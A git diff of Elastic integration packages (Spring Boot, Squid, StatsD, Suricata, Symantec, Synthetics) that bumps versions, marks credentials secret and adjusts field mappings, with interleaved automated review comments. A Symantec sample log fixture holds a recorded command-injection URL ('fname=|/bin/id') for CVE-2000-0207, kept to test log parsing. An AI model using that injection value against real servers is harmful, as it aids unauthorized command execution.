- "yTitle": "GC Memory Usage"
- }
- },
- "title": "Memory usage after and before GC [Metrics Spring Boot]",
- "visualizationType": "lnsXY"
- },
- "coreMigrationVersion": "8.7.1",
- "created_at": "2023-11-02T08:40:52.790Z",
- "id": "spring_boot-fae00cb0-ca04-11ec-b4b1-b57f75afa7dd",
- "migrationVersion": {
- "lens": "8.6.0"
- },
- "references": [
- {
- "id": "metrics-*",
- "name": "indexpattern-datasource-layer-e937f0c4-f880-4837-9315-69d043a3f6b1",
- "type": "index-pattern"
- },
- {
- "id": "metrics-*",
- "name": "8aabc9bc-b40b-4f3c-b077-c4d19cd6b477",
- "type": "index-pattern"
- }
- ],
- "type": "lens"
-}
\ No newline at end of file
diff --git a/packages/spring_boot/manifest.yml b/packages/spring_boot/manifest.yml
index e4e0db12119..c0641f41ec6 100644
--- a/packages/spring_boot/manifest.yml
+++ b/packages/spring_boot/manifest.yml
@@ -1,7 +1,7 @@
-format_version: "3.0.0"
+format_version: "3.0.2"
name: spring_boot
title: Spring Boot
-version: "1.2.1"
+version: "1.4.0"
description: This Elastic integration collects logs and metrics from Spring Boot integration.
type: integration
categories:
@@ -9,7 +9,7 @@ categories:
- java_observability
conditions:
kibana:
- version: ^8.9.0
+ version: ^8.12.0
elastic:
subscription: basic
screenshots:
@@ -88,6 +88,7 @@ policy_templates:
- name: password
type: password
title: Password
+ secret: true
multi: false
required: false
show_user: false
diff --git a/packages/squid/_dev/deploy/docker/docker-compose.yml b/packages/squid/_dev/deploy/docker/docker-compose.yml
index b63005a03a3..7f5d4be570f 100644
--- a/packages/squid/_dev/deploy/docker/docker-compose.yml
+++ b/packages/squid/_dev/deploy/docker/docker-compose.yml
@@ -7,14 +7,12 @@ services:
- ${SERVICE_LOGS_DIR}:/var/log
command: /bin/sh -c "cp /sample_logs/* /var/log/"
squid-log-udp:
- image: akroh/stream:v0.2.0
+ image: docker.elastic.co/observability/stream:v0.15.0
volumes:
- ./sample_logs:/sample_logs:ro
- entrypoint: /bin/bash
- command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9537 -p=udp /sample_logs/squid-log-*.log"
+ command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9537 -p=udp /sample_logs/squid-log-*.log
squid-log-tcp:
- image: akroh/stream:v0.2.0
+ image: docker.elastic.co/observability/stream:v0.15.0
volumes:
- ./sample_logs:/sample_logs:ro
- entrypoint: /bin/bash
- command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9537 -p=tcp /sample_logs/squid-log-*.log"
+ command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9537 -p=tcp /sample_logs/squid-log-*.log
diff --git a/packages/statsd_input/_dev/test/system/test-default-config.yml b/packages/statsd_input/_dev/test/system/test-default-config.yml
index e975ae16b8a..84a02f9e365 100644
--- a/packages/statsd_input/_dev/test/system/test-default-config.yml
+++ b/packages/statsd_input/_dev/test/system/test-default-config.yml
@@ -4,4 +4,4 @@ vars:
listen_port: 8125
data_stream.dataset: statsd_input.statsd
assert:
- hit_count: 3
+ hit_count: 6
diff --git a/packages/statsd_input/changelog.yml b/packages/statsd_input/changelog.yml
index 554f94c71b6..d6e297103e1 100644
--- a/packages/statsd_input/changelog.yml
+++ b/packages/statsd_input/changelog.yml
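Review bot: The two new `image: docker.elastic.co/observability/stream:v0.15.0` lines pin the fixture only by a mutable tag, so the image CI pulls can change without any diff in this repository; pinning by digest as well, `image: docker.elastic.co/observability/stream:v0.15.0@sha256:<digest-placeholder>`, keeps the system test reproducible. Removing `entrypoint: /bin/bash` also makes `command: log --start-signal=SIGHUP ...` depend on the new image's default entrypoint being the stream binary, which the hunk cannot show; a one-line comment above the service, `# image entrypoint is the stream binary, so only its subcommand is given here`, would spare the next person who bumps the tag from rediscovering that.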
@@ -1,4 +1,9 @@
# newer versions go on top
+- version: "0.3.0"
+ changes:
+ - description: Update to Kibana 8.11 to support enhanced statsd implementation, and fix system test cases.
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9596
- version: "0.2.3"
changes:
- description: Improve documentation for the package.
diff --git a/packages/statsd_input/manifest.yml b/packages/statsd_input/manifest.yml
index 62e2f12ec9a..6f0b2257371 100644
--- a/packages/statsd_input/manifest.yml
+++ b/packages/statsd_input/manifest.yml
@@ -1,13 +1,13 @@
format_version: 2.0.0
name: statsd_input
title: StatsD Input
-version: "0.2.3"
+version: "0.3.0"
description: StatsD Input Package
type: input
categories:
- observability
conditions:
- kibana.version: "^8.8.0"
+ kibana.version: "^8.11.0"
elastic.subscription: "basic"
icons:
- src: /img/statsd.svg
diff --git a/packages/statsd_input/sample_event.json b/packages/statsd_input/sample_event.json
index a20820c4b3d..30c85427a9a 100644
--- a/packages/statsd_input/sample_event.json
+++ b/packages/statsd_input/sample_event.json
@@ -1,11 +1,11 @@
{
- "@timestamp": "2023-06-19T05:20:48.498Z",
+ "@timestamp": "2024-04-15T14:06:01.418Z",
"agent": {
- "ephemeral_id": "19e6fd95-249c-4433-977e-5b1778a5d94e",
- "id": "741b6193-4f1c-4fec-b58c-e038b4ca671b",
+ "ephemeral_id": "ee629c67-5780-4bfd-83c0-c89a032eba12",
+ "id": "b2bdd114-8042-4441-bd68-123aee9eca3b",
"name": "docker-fleet-agent",
"type": "metricbeat",
- "version": "8.8.0"
+ "version": "8.11.0"
},
"data_stream": {
"dataset": "statsd_input.statsd",
@@ -16,32 +16,32 @@
"version": "8.0.0"
},
"elastic_agent": {
- "id": "741b6193-4f1c-4fec-b58c-e038b4ca671b",
+ "id": "b2bdd114-8042-4441-bd68-123aee9eca3b",
"snapshot": false,
- "version": "8.8.0"
+ "version": "8.11.0"
},
"event": {
"agent_id_status": "verified",
"dataset": "statsd_input.statsd",
- "ingested": "2023-06-19T05:20:49Z",
+ "ingested": "2024-04-15T14:06:02Z",
"module": "statsd"
},
"host": {
"architecture": "x86_64",
"containerized": true,
"hostname": "docker-fleet-agent",
- "id": "e8978f2086c14e13b7a0af9ed0011d19",
+ "id": "d7fd92f5e61644938d48518adcee73ad",
"ip": [
- "192.168.240.7"
+ "172.25.0.7"
],
"mac": [
- "02-42-C0-A8-F0-07"
+ "02-42-AC-19-00-07"
],
"name": "docker-fleet-agent",
"os": {
"codename": "focal",
"family": "debian",
- "kernel": "3.10.0-1160.88.1.el7.x86_64",
+ "kernel": "3.10.0-1160.102.1.el7.x86_64",
"name": "Ubuntu",
"platform": "ubuntu",
"type": "linux",
@@ -58,25 +58,6 @@
"statsd": {
"python_counter": {
"count": 4
- },
- "python_gauge_foo": {
- "value": 10
- },
- "python_timer_total": {
- "15m_rate": 0.2022160607980413,
- "1m_rate": 0.2319822341482707,
- "5m_rate": 0.206611418471353,
- "count": 4,
- "max": 0,
- "mean": 0,
- "mean_rate": 2.2908631551250593,
- "median": 0,
- "min": 0,
- "p75": 0,
- "p95": 0,
- "p99": 0,
- "p99_9": 0,
- "stddev": 0
}
}
}
\ No newline at end of file
diff --git a/packages/suricata/changelog.yml b/packages/suricata/changelog.yml
index b5f6bec995b..75d0ef875ca 100644
--- a/packages/suricata/changelog.yml
+++ b/packages/suricata/changelog.yml
@@ -1,4 +1,9 @@
# newer versions go on top
+- version: "2.21.0"
+ changes:
+ - description: Update package-spec to 3.0.3.
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9235
- version: "2.20.2"
changes:
- description: Changed owners
diff --git a/packages/suricata/manifest.yml b/packages/suricata/manifest.yml
index 1dfa728864d..3598a0acbf3 100644
--- a/packages/suricata/manifest.yml
+++ b/packages/suricata/manifest.yml
@@ -1,6 +1,6 @@
name: suricata
title: Suricata
-version: "2.20.2"
+version: "2.21.0"
description: Collect logs from Suricata with Elastic Agent.
type: integration
icons:
@@ -8,7 +8,7 @@ icons:
title: suricata
size: 309x309
type: image/svg+xml
-format_version: "3.0.0"
+format_version: "3.0.3"
categories: [network, security, ids_ips]
conditions:
kibana:
diff --git a/packages/symantec_edr_cloud/changelog.yml b/packages/symantec_edr_cloud/changelog.yml
index f0d8a57e500..ad4bffb350a 100644
--- a/packages/symantec_edr_cloud/changelog.yml
+++ b/packages/symantec_edr_cloud/changelog.yml
@@ -1,4 +1,9 @@
# newer versions go on top
+- version: "1.1.0"
+ changes:
+ - description: Set sensitive values as secret.
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9128
- version: "1.0.1"
changes:
- description: Changed owners
diff --git a/packages/symantec_edr_cloud/manifest.yml b/packages/symantec_edr_cloud/manifest.yml
index b0388bdc91f..7c72366669f 100644
--- a/packages/symantec_edr_cloud/manifest.yml
+++ b/packages/symantec_edr_cloud/manifest.yml
@@ -1,7 +1,7 @@
-format_version: 3.0.0
+format_version: 3.0.2
name: symantec_edr_cloud
title: Symantec EDR Cloud
-version: "1.0.1"
+version: "1.1.0"
source:
license: Elastic-2.0
description: Collect logs from Symantec EDR Cloud with Elastic Agent.
@@ -10,7 +10,7 @@ categories:
- security
conditions:
kibana:
- version: ^8.10.1
+ version: ^8.12.0
elastic:
subscription: basic
screenshots:
@@ -46,6 +46,7 @@ policy_templates:
multi: false
required: true
show_user: true
+ secret: true
- name: url
type: text
title: URL
@@ -60,6 +61,7 @@ policy_templates:
default: https://api.sep.securitycloud.symantec.com/v1/oauth2/tokens
required: true
show_user: false
+ secret: false
- name: proxy_url
type: text
title: Proxy URL
diff --git a/packages/symantec_endpoint/_dev/deploy/docker/sample_logs/symantec_endpoint.log b/packages/symantec_endpoint/_dev/deploy/docker/sample_logs/symantec_endpoint.log
index 6ea679866c9..754e554ac81 100644
--- a/packages/symantec_endpoint/_dev/deploy/docker/sample_logs/symantec_endpoint.log
+++ b/packages/symantec_endpoint/_dev/deploy/docker/sample_logs/symantec_endpoint.log
@@ -24,4 +24,4 @@ Site: SEPSite,Server: exampleHostname,Symantec Endpoint Protection Manager could
Site: SEPSite,Server: exampleHostname,Number of old risk events swept: 130
Site: SEPSite,Server: exampleHostname,LiveUpdate started.
Site: SEPSite,Server: exampleHostname,Database maintenance started.
-2020-01-16 08:00:31,Critical,serverName,Event Description: [SID: 20521] Web Attack: SGI InfoSearch fname Exec CVE-2000-0207 attack blocked. Traffic has been blocked for this application: C:\WINDOWS\SYSTEM32\INETSRV\W3WP.EXE,Local Host IP: 127.0.0.1,Local Host MAC: 000000000000,Remote Host Name: ,Remote Host IP: 127.0.0.1,Remote Host MAC: 000000000000,Outbound,TCP,Intrusion ID: 0,Begin: 2021-12-14 14:56:01,End: 2021-12-14 14:56:01,Occurrences: 1,Application: C:/WINDOWS/SYSTEM32/INETSRV/W3WP.EXE,Location: Default,User: someuser,Domain: DOMAIN,Local Port: 54301,Remote Port: 5112,CIDS Signature ID: 20521,CIDS Signature string: Web Attack: SGI InfoSearch fname Exec CVE-2000-0207,CIDS Signature SubID: 75437,Intrusion URL: www.example.com/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|/bin/id,Intrusion Payload URL: ,SHA-256: ABCDEC4B72DB91F168C36C500C1BE9AE391C1FF09CD65295BB24267D35373FD9,MD-5:
\ No newline at end of file
+2020-01-16 08:00:31,Critical,serverName,Event Description: [SID: 20521] Web Attack: SGI InfoSearch fname Exec CVE-2000-0207 attack blocked.
Traffic has been blocked for this application: C:\WINDOWS\SYSTEM32\INETSRV\W3WP.EXE,Local Host IP: 127.0.0.1,Local Host MAC: 000000000000,Remote Host Name: ,Remote Host IP: 127.0.0.1,Remote Host MAC: 000000000000,Outbound,TCP,Intrusion ID: 0,Begin: 2021-12-14 14:56:01,End: 2021-12-14 14:56:01,Occurrences: 1,Application: C:/WINDOWS/SYSTEM32/INETSRV/W3WP.EXE,Location: Default,User: someuser,Domain: DOMAIN,Local Port: 54301,Remote Port: 5112,CIDS Signature ID: 20521,CIDS Signature string: Web Attack: SGI InfoSearch fname Exec CVE-2000-0207,CIDS Signature SubID: 75437,Intrusion URL: www.example.com/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|/bin/id,Intrusion Payload URL: ,SHA-256: ABCDEC4B72DB91F168C36C500C1BE9AE391C1FF09CD65295BB24267D35373FD9,MD-5:
diff --git a/packages/symantec_endpoint/changelog.yml b/packages/symantec_endpoint/changelog.yml
index 21f798e0bfc..459db0dc3f5 100644
--- a/packages/symantec_endpoint/changelog.yml
+++ b/packages/symantec_endpoint/changelog.yml
@@ -1,4 +1,9 @@
# newer versions go on top
+- version: "2.15.0"
+ changes:
+ - description: Update manifest format version to v3.0.3.
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9403
- version: "2.14.2"
changes:
- description: Changed owners
diff --git a/packages/symantec_endpoint/data_stream/log/_dev/test/system/test-logfile-config.yml b/packages/symantec_endpoint/data_stream/log/_dev/test/system/test-logfile-config.yml
index 0855ccf57fa..c06b2524491 100644
--- a/packages/symantec_endpoint/data_stream/log/_dev/test/system/test-logfile-config.yml
+++ b/packages/symantec_endpoint/data_stream/log/_dev/test/system/test-logfile-config.yml
@@ -5,3 +5,5 @@ data_stream:
paths:
- "{{SERVICE_LOGS_DIR}}/symantec_endpoint*.log"
preserve_original_event: true
+assert:
+ hit_count: 27
diff --git a/packages/symantec_endpoint/data_stream/log/_dev/test/system/test-tcp-config.yml b/packages/symantec_endpoint/data_stream/log/_dev/test/system/test-tcp-config.yml
index 720efab0045..caeb3ab401f 100644
--- a/packages/symantec_endpoint/data_stream/log/_dev/test/system/test-tcp-config.yml
+++ b/packages/symantec_endpoint/data_stream/log/_dev/test/system/test-tcp-config.yml
@@ -6,3 +6,5 @@ data_stream:
listen_address: 0.0.0.0
listen_port: 9514
preserve_original_event: true
+assert:
+ hit_count: 27
diff --git a/packages/symantec_endpoint/data_stream/log/_dev/test/system/test-udp-config.yml b/packages/symantec_endpoint/data_stream/log/_dev/test/system/test-udp-config.yml
index bac96ec5b80..3be18610c0b 100644
--- a/packages/symantec_endpoint/data_stream/log/_dev/test/system/test-udp-config.yml
+++ b/packages/symantec_endpoint/data_stream/log/_dev/test/system/test-udp-config.yml
@@ -6,3 +6,5 @@ data_stream:
listen_address: 0.0.0.0
listen_port: 9514
preserve_original_event: true
+assert:
+ hit_count: 27
diff --git a/packages/symantec_endpoint/manifest.yml b/packages/symantec_endpoint/manifest.yml
index 5f093d7b691..0955664c4c3 100644
--- a/packages/symantec_endpoint/manifest.yml
+++ b/packages/symantec_endpoint/manifest.yml
@@ -1,9 +1,9 @@
name: symantec_endpoint
title: Symantec Endpoint Protection
-version: "2.14.2"
+version: "2.15.0"
description: Collect logs from Symantec Endpoint Protection with Elastic Agent.
type: integration
-format_version: "3.0.0"
+format_version: "3.0.3"
categories: ["security", "edr_xdr"]
conditions:
kibana:
diff --git a/packages/synthetics/changelog.yml b/packages/synthetics/changelog.yml
index a38340ed534..c9ed5cfbcea 100644
--- a/packages/synthetics/changelog.yml
+++ b/packages/synthetics/changelog.yml
@@ -1,4 +1,14 @@ # newer versions go on top +- version: "1.2.1" + changes: + - description: Re-introduce pre-release changes from 1.2.0-rc1 + type: enhancement + link: https://github.com/elastic/integrations/pull/9058 +- version: "1.2.0-rc1" + changes: + - description: Adopt package spec v3 + type: enhancement + link: https://github.com/elastic/integrations/pull/8546 - version: "1.1.1" changes: - description: Fix meta container mapping diff --git a/packages/synthetics/data_stream/browser/fields/common.yml b/packages/synthetics/data_stream/browser/fields/common.yml index c3e4300c8bb..6608ccb762e 100644 --- a/packages/synthetics/data_stream/browser/fields/common.yml +++ b/packages/synthetics/data_stream/browser/fields/common.yml @@ -15,6 +15,7 @@ object_type: keyword description: > The meta fields allow you to add additional information to a monitor. + - name: monitor type: group description: > @@ -58,7 +59,6 @@ IP of service being monitored. If service is monitored by hostname, the `ip` field contains the resolved ip address for the current host. - name: status - required: true type: keyword description: > Indicator if monitor could validate the service to be available. diff --git a/packages/synthetics/data_stream/browser/fields/ecs.yml b/packages/synthetics/data_stream/browser/fields/ecs.yml index c2d2b7940fb..55779a51123 100644 --- a/packages/synthetics/data_stream/browser/fields/ecs.yml +++ b/packages/synthetics/data_stream/browser/fields/ecs.yml 
@@ -168,6 +168,7 @@ - name: answers level: extended type: object + object_type: keyword description: "An array containing an object for each answer section returned by the server.\nThe main keys that should be present in these objects are defined by ECS. Records that have more information may contain more keys than what ECS defines.\nNot all DNS data sources give all details about DNS answers. At minimum, answer objects must contain the `data` key. If more information is available, map as much of it to ECS as possible, and add any additional fields to the answer objects as custom fields." - name: answers.class level: extended @@ -285,7 +286,6 @@ fields: - name: version level: core - required: true type: keyword ignore_above: 1024 description: "ECS version this event conforms to. `ecs.version` is a required field and must exist in all events.\nWhen querying across multiple indices -- which may conform to slightly different ECS versions -- this field lets integrations adjust to the schema version of the events." diff --git a/packages/synthetics/data_stream/browser/fields/http.yml b/packages/synthetics/data_stream/browser/fields/http.yml index 40dd8b42ee9..b113de142eb 100644 --- a/packages/synthetics/data_stream/browser/fields/http.yml +++ b/packages/synthetics/data_stream/browser/fields/http.yml @@ -22,6 +22,7 @@ - name: headers.* type: object + object_type: keyword enabled: false description: > The canonical headers of the monitored HTTP response. diff --git a/packages/synthetics/data_stream/browser/fields/summary.yml b/packages/synthetics/data_stream/browser/fields/summary.yml index 8ee50da76cd..7ca8314dcb2 100644 --- a/packages/synthetics/data_stream/browser/fields/summary.yml +++ b/packages/synthetics/data_stream/browser/fields/summary.yml 
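Review bot: Dropping `required: true` from `ecs.version` in the second hunk leaves a field whose own description still says "`ecs.version` is a required field and must exist in all events", so the declaration and the documentation now disagree; the same removal is applied to `monitor.status` in common.yml (L8228), where it was the only machine-checkable guarantee that every event carries a status. If the attribute had to go because package-spec v3 no longer accepts it (the changelog on L8228 says "Adopt package spec v3"), presence is presumably enforced by the producer instead, and a comment at the field such as `# required: true removed for package-spec v3; presence is enforced by the producer — confirm` would record that. The identical hunks in browser_network (L8232), browser_screenshot (L8235) and http (L8238) have the same gap.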
@@ -11,24 +11,27 @@ type: integer description: > The number of endpoints that failed + - name: status type: keyword description: > The status of this check as a whole. Either up or down. + - name: attempt type: short description: > When performing a check this number is 1 for the first check, and increments in the event of a retry. + - name: max_attempts type: short description: > The maximum number of checks that may be performed. Note, the actual number may be smaller. + - name: final_attempt type: boolean description: > True if no further checks will be performed in this retry group. + - name: retry_group type: keyword - description: > - A unique token used to group checks across attempts. - + description: "A unique token used to group checks across attempts. \n" diff --git a/packages/synthetics/data_stream/browser/fields/synthetics.yml b/packages/synthetics/data_stream/browser/fields/synthetics.yml index 1e31bd01d91..3031f112f4c 100644 --- a/packages/synthetics/data_stream/browser/fields/synthetics.yml +++ b/packages/synthetics/data_stream/browser/fields/synthetics.yml @@ -14,6 +14,7 @@ Indexed used for creating total order of all events in this invocation. - name: payload + object_type: keyword type: object enabled: false - name: blob diff --git a/packages/synthetics/data_stream/browser/lifecycle.yml b/packages/synthetics/data_stream/browser/lifecycle.yml new file mode 100644 index 00000000000..d00bd25910f --- /dev/null +++ b/packages/synthetics/data_stream/browser/lifecycle.yml @@ -0,0 +1 @@ +data_retention: "365d" diff --git a/packages/synthetics/data_stream/browser/manifest.yml b/packages/synthetics/data_stream/browser/manifest.yml index 2467326c39d..5ec704e9e72 100644 --- a/packages/synthetics/data_stream/browser/manifest.yml +++ b/packages/synthetics/data_stream/browser/manifest.yml 
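Review bot: The rewritten `retry_group` description, `description: "A unique token used to group checks across attempts. \n"`, keeps a trailing space and an explicit newline inside a double-quoted scalar, which reads as the residue of an automated conversion rather than an intended value; the browser_screenshot copy of this file (L8236) expresses the same text as `description: >-` followed by `A unique token used to group checks across attempts.` on its own line, and that form is the one to use here and in browser_network (L8233). The field's description is display text, so the stray whitespace is harmless, but the three copies should agree.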
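Review bot: The new lifecycle.yml sets `data_retention: "365d"` with no comment on why browser check results are kept for a year while the browser_network and browser_screenshot streams added in the same commit (L8233, L8236) keep only 14d; presumably the check documents are small and feed monitor history whereas network and screenshot payloads are heavy, and a one-line comment stating that would keep the two numbers from being "harmonised" by mistake later. A retention policy is also a user-visible change, and neither changelog entry on L8228 ("Re-introduce pre-release changes from 1.2.0-rc1", "Adopt package spec v3") mentions it, so it deserves its own changelog line.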
@@ -9,10 +9,12 @@ elasticsearch: settings: index: codec: best_compression - sort.field: - - "url.full.keyword" - - "monitor.id" - privileges.indices: [auto_configure, create_doc, read] + sort: + field: + - "url.full.keyword" + - "monitor.id" + privileges: + indices: [auto_configure, create_doc, read] streams: - input: synthetics/browser title: Synthetic monitor check @@ -52,7 +54,7 @@ streams: multi: false required: true show_user: true - default: "\"@every 3m\"" + default: '"@every 3m"' - name: service.name type: text title: APM Service Name @@ -171,4 +173,4 @@ streams: multi: false required: false show_user: true - default: 2 \ No newline at end of file + default: 2 diff --git a/packages/synthetics/data_stream/browser_network/fields/common.yml b/packages/synthetics/data_stream/browser_network/fields/common.yml index 8d7b1605f00..841230154ce 100644 --- a/packages/synthetics/data_stream/browser_network/fields/common.yml +++ b/packages/synthetics/data_stream/browser_network/fields/common.yml @@ -15,6 +15,7 @@ object_type: keyword description: > The meta fields allow you to add additional information to a monitor. + - name: monitor type: group description: > @@ -58,7 +59,6 @@ IP of service being monitored. If service is monitored by hostname, the `ip` field contains the resolved ip address for the current host. - name: status - required: true type: keyword description: > Indicator if monitor could validate the service to be available. diff --git a/packages/synthetics/data_stream/browser_network/fields/ecs.yml b/packages/synthetics/data_stream/browser_network/fields/ecs.yml index c2d2b7940fb..55779a51123 100644 --- a/packages/synthetics/data_stream/browser_network/fields/ecs.yml +++ b/packages/synthetics/data_stream/browser_network/fields/ecs.yml 
@@ -168,6 +168,7 @@ - name: answers level: extended type: object + object_type: keyword description: "An array containing an object for each answer section returned by the server.\nThe main keys that should be present in these objects are defined by ECS. Records that have more information may contain more keys than what ECS defines.\nNot all DNS data sources give all details about DNS answers. At minimum, answer objects must contain the `data` key. If more information is available, map as much of it to ECS as possible, and add any additional fields to the answer objects as custom fields." - name: answers.class level: extended @@ -285,7 +286,6 @@ fields: - name: version level: core - required: true type: keyword ignore_above: 1024 description: "ECS version this event conforms to. `ecs.version` is a required field and must exist in all events.\nWhen querying across multiple indices -- which may conform to slightly different ECS versions -- this field lets integrations adjust to the schema version of the events." diff --git a/packages/synthetics/data_stream/browser_network/fields/http.yml b/packages/synthetics/data_stream/browser_network/fields/http.yml index 51b5c0166d0..1c5904cda05 100644 --- a/packages/synthetics/data_stream/browser_network/fields/http.yml +++ b/packages/synthetics/data_stream/browser_network/fields/http.yml @@ -38,6 +38,7 @@ - name: headers.* type: object + object_type: keyword enabled: false description: > The canonical headers of the monitored HTTP response. diff --git a/packages/synthetics/data_stream/browser_network/fields/summary.yml b/packages/synthetics/data_stream/browser_network/fields/summary.yml index 18bf897ffad..ffecf3b7b5a 100644 --- a/packages/synthetics/data_stream/browser_network/fields/summary.yml +++ b/packages/synthetics/data_stream/browser_network/fields/summary.yml 
@@ -11,23 +11,27 @@ type: integer description: > The number of endpoints that failed + - name: status type: keyword description: > The status of this check as a whole. Either up or down. + - name: attempt type: short description: > When performing a check this number is 1 for the first check, and increments in the event of a retry. + - name: max_attempts type: short description: > The maximum number of checks that may be performed. Note, the actual number may be smaller. + - name: final_attempt type: boolean description: > True if no further checks will be performed in this retry group. + - name: retry_group type: keyword - description: > - A unique token used to group checks across attempts. + description: "A unique token used to group checks across attempts. \n" diff --git a/packages/synthetics/data_stream/browser_network/fields/synthetics.yml b/packages/synthetics/data_stream/browser_network/fields/synthetics.yml index c3520935d3f..2ae4f0618fc 100644 --- a/packages/synthetics/data_stream/browser_network/fields/synthetics.yml +++ b/packages/synthetics/data_stream/browser_network/fields/synthetics.yml @@ -15,6 +15,7 @@ - name: payload type: object + object_type: text enabled: false - name: blob type: binary diff --git a/packages/synthetics/data_stream/browser_network/lifecycle.yml b/packages/synthetics/data_stream/browser_network/lifecycle.yml new file mode 100644 index 00000000000..655b101047b --- /dev/null +++ b/packages/synthetics/data_stream/browser_network/lifecycle.yml @@ -0,0 +1 @@ +data_retention: "14d" diff --git a/packages/synthetics/data_stream/browser_network/manifest.yml b/packages/synthetics/data_stream/browser_network/manifest.yml index 38a4efa8866..ddfaea9f46e 100644 --- a/packages/synthetics/data_stream/browser_network/manifest.yml +++ b/packages/synthetics/data_stream/browser_network/manifest.yml 
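Review bot: The `payload` field gets `object_type: text` here and in browser_screenshot (L8236) but `object_type: keyword` in the browser stream's synthetics.yml (L8230), and nothing in the commit says why the three copies diverge. Since each of these `payload` definitions also carries `enabled: false`, the object is presumably not indexed and the choice may have no mapping effect, but an accidental difference in otherwise parallel files is exactly what gets copied forward; pick one value for all three and note the reason, e.g. `# object_type is required by package-spec for type: object; field is not indexed (enabled: false)`.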
@@ -9,12 +9,14 @@ elasticsearch: settings: index: codec: best_compression - sort.field: - - "url.full.keyword" - - "http.request.url.keyword" - - "http.response.headers.etag" - - "monitor.id" - privileges.indices: [auto_configure, create_doc, read] + sort: + field: + - "url.full.keyword" + - "http.request.url.keyword" + - "http.response.headers.etag" + - "monitor.id" + privileges: + indices: [auto_configure, create_doc, read] streams: - input: synthetics/browser title: Synthetics monitors network information diff --git a/packages/synthetics/data_stream/browser_screenshot/fields/common.yml b/packages/synthetics/data_stream/browser_screenshot/fields/common.yml index 8d7b1605f00..841230154ce 100644 --- a/packages/synthetics/data_stream/browser_screenshot/fields/common.yml +++ b/packages/synthetics/data_stream/browser_screenshot/fields/common.yml @@ -15,6 +15,7 @@ object_type: keyword description: > The meta fields allow you to add additional information to a monitor. + - name: monitor type: group description: > @@ -58,7 +59,6 @@ IP of service being monitored. If service is monitored by hostname, the `ip` field contains the resolved ip address for the current host. - name: status - required: true type: keyword description: > Indicator if monitor could validate the service to be available. diff --git a/packages/synthetics/data_stream/browser_screenshot/fields/ecs.yml b/packages/synthetics/data_stream/browser_screenshot/fields/ecs.yml index 707899664a1..1b87e7fa554 100644 --- a/packages/synthetics/data_stream/browser_screenshot/fields/ecs.yml +++ b/packages/synthetics/data_stream/browser_screenshot/fields/ecs.yml 
@@ -168,6 +168,7 @@ - name: answers level: extended type: object + object_type: keyword description: "An array containing an object for each answer section returned by the server.\nThe main keys that should be present in these objects are defined by ECS. Records that have more information may contain more keys than what ECS defines.\nNot all DNS data sources give all details about DNS answers. At minimum, answer objects must contain the `data` key. If more information is available, map as much of it to ECS as possible, and add any additional fields to the answer objects as custom fields." - name: answers.class level: extended @@ -285,7 +286,6 @@ fields: - name: version level: core - required: true type: keyword ignore_above: 1024 description: "ECS version this event conforms to. `ecs.version` is a required field and must exist in all events.\nWhen querying across multiple indices -- which may conform to slightly different ECS versions -- this field lets integrations adjust to the schema version of the events." diff --git a/packages/synthetics/data_stream/browser_screenshot/fields/summary.yml b/packages/synthetics/data_stream/browser_screenshot/fields/summary.yml index 34bb24ac038..a35396da23c 100644 --- a/packages/synthetics/data_stream/browser_screenshot/fields/summary.yml +++ b/packages/synthetics/data_stream/browser_screenshot/fields/summary.yml 
@@ -16,19 +16,23 @@ type: keyword description: > The status of this check as a whole. Either up or down. + - name: attempt type: short description: > When performing a check this number is 1 for the first check, and increments in the event of a retry. + - name: max_attempts type: short description: > The maximum number of checks that may be performed. Note, the actual number may be smaller. + - name: final_attempt type: boolean description: > True if no further checks will be performed in this retry group. + - name: retry_group type: keyword - description: > - A unique token used to group checks across attempts. \ No newline at end of file + description: >- + A unique token used to group checks across attempts. diff --git a/packages/synthetics/data_stream/browser_screenshot/fields/synthetics.yml b/packages/synthetics/data_stream/browser_screenshot/fields/synthetics.yml index 53baa9148d8..c349cf35969 100644 --- a/packages/synthetics/data_stream/browser_screenshot/fields/synthetics.yml +++ b/packages/synthetics/data_stream/browser_screenshot/fields/synthetics.yml @@ -15,6 +15,7 @@ - name: payload type: object + object_type: text enabled: false - name: blob type: binary diff --git a/packages/synthetics/data_stream/browser_screenshot/lifecycle.yml b/packages/synthetics/data_stream/browser_screenshot/lifecycle.yml new file mode 100644 index 00000000000..655b101047b --- /dev/null +++ b/packages/synthetics/data_stream/browser_screenshot/lifecycle.yml @@ -0,0 +1 @@ +data_retention: "14d" diff --git a/packages/synthetics/data_stream/browser_screenshot/manifest.yml b/packages/synthetics/data_stream/browser_screenshot/manifest.yml index b1d8329da74..ef2905baf52 100644 --- a/packages/synthetics/data_stream/browser_screenshot/manifest.yml +++ b/packages/synthetics/data_stream/browser_screenshot/manifest.yml 
@@ -9,9 +9,11 @@ elasticsearch: settings: index: codec: best_compression - sort.field: - - "monitor.id" - privileges.indices: [auto_configure, create_doc, read] + sort: + field: + - "monitor.id" + privileges: + indices: [auto_configure, create_doc, read] streams: - input: synthetics/browser title: Synthetics monitors screenshot information diff --git a/packages/synthetics/data_stream/http/fields/common.yml b/packages/synthetics/data_stream/http/fields/common.yml index feb2d2623d3..02b25d52a89 100644 --- a/packages/synthetics/data_stream/http/fields/common.yml +++ b/packages/synthetics/data_stream/http/fields/common.yml @@ -15,10 +15,11 @@ object_type: keyword description: > The meta fields allow you to add additional information to a monitor. + - name: monitor type: group description: > - Common monitor fields. + Common monitor fields. fields: - name: type @@ -58,7 +59,6 @@ IP of service being monitored. If service is monitored by hostname, the `ip` field contains the resolved ip address for the current host. - name: status - required: true type: keyword description: > Indicator if monitor could validate the service to be available. diff --git a/packages/synthetics/data_stream/http/fields/ecs.yml b/packages/synthetics/data_stream/http/fields/ecs.yml index c2d2b7940fb..55779a51123 100644 --- a/packages/synthetics/data_stream/http/fields/ecs.yml +++ b/packages/synthetics/data_stream/http/fields/ecs.yml 
